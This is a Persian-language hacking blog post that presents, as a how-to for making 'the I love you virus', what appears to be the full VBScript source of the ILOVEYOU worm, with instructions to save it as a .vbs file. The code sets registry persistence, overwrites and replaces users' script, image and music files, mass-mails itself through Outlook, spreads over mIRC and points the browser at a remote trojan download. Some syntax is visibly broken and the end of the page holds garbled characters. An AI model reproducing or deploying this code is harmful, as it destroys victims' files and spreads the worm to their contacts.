تبلیغات
پس چرا نظر نمی دید در سایت ما عضو شوید ...آموزش هک,ویروس سازی،وکامپیوتر و کدهای تقلب بازی - ساخت ویروس i lov yoy
منوی كاربری

این وبلاگ را صفحه خانگی خود كن !    به مدیر وبلاگ ایمیل بزنید !    این وبلاگ را به لیست علاقه مندی های خود اضافه كنید !

پیغام مدیر : به شما كاربر گرامی سلام عرض می كنم . امیدوارم در این وبلاگ دقایقی خوبی را سپری كنید . برای آگاهی از امكانات این وبلاگ خواهشمندم كه تا آخر صفحه این وبلاگ را مشاهده نمایید .

نظرسنجی
از کدام یک از مطالب خوشت اومده؟


آدرس های دیگر
* نام شما :
* ایمیل شما :
وب سایت شما :
* متن پیام :
Powered By :JustPersian
ثبت نام
نام شما :
نام کاربری :
ایمیل :
کلمه عبور :
تکرار کلمه عبور :
Powered By :JustPersian
ورود به کنترل پنل خود
نام کاربری :
کلمه عبور :
Powered By :JustPersian
فیلتر شكن
صفحات وبلاگ
لینك به ما / لوگوی دوستان
لینك به ما


لوگوی دوستان

آمار وبلاگ
امروز :

بازدید های امروز :

بازدید های دیروز :

كل بازدیدها :

كل مطالب :

كل نظرات :

ایجاد صفحه : - ثانیه

جمعه 16 شهریور 1386
ساخت ویروس i lov yoy
سلام. برای ساختن ویروس i love you باید کد های زیر را در یک برنامه ویرایش متن مثل نت پد خودتون کپی کنید و اون رو با نام دلخواه ولی با پسوند vbs. ذخیره کنید مثلا:

your file name.vbs

این هم از کد ها:rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject"
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell"
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout"
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs"
c.Copy(dirwin&"\Win32DLL.vbs"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory"
if (downread="" then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe"=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe"=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\"
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs" or (ext="vbe" then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js" or (ext="jse" or (ext="css" or (ext="wsh" or (ext="sct"
or (ext="hta" then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs"
fso.DeleteFile(f1.path)
elseif(ext="jpg" or (ext="jpeg" then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs"
fso.DeleteFile(f1.path)
elseif(ext="mp3" or (ext="mp2" then
set mp3=fso.CreateTextFile(f1.path&".vbs"
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe" or (s="mlink32.exe" or (s="mirc.ini" or
(s="script.ini" or (s="mirc.hlp" then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini"
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell"
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell"
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell"
set out=WScript.CreateObject("Outlook.Application"
set mapi=out.GetNameSpace("MAPI"
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="" then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="" then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - "&vbcrlf'>LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March "&vbcrlf'>2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
"&vbcrlf'>good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ "&vbcrlf'>BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<script "&vbcrlf'>language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<script "&vbcrlf'>LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'"
dt1=replace(dt1,chr(64)&chr(45)&chr(64),""""
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/"
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\"
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'"
dt2=replace(dt2,chr(64)&chr(45)&chr(64),""""
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/"
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\"
set fso=CreateObject("Scripting.FileSystemObject"
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM"
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ ــ

حالا به همین راحتی شما یه ویروس ساختین!

ولی مواظب باشید که روش کلیک نکنید اجرا بشه!
نوشته شده توسط متین نصیری ساعت 06:09 ق.ظ موضوع مطلب :‌ ویروس سازی ,

ویرایش شده در - و ساعت -

لینك ثابت | نظرات ()


This Template Designed By Theme.MihanBlog.Com And Davood Jafari
LINK NAME
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

ãä íß Èå ÏäÈÇá ÈÇ Óä ÈÇ ßÏ ÔåÑ
ÊÇ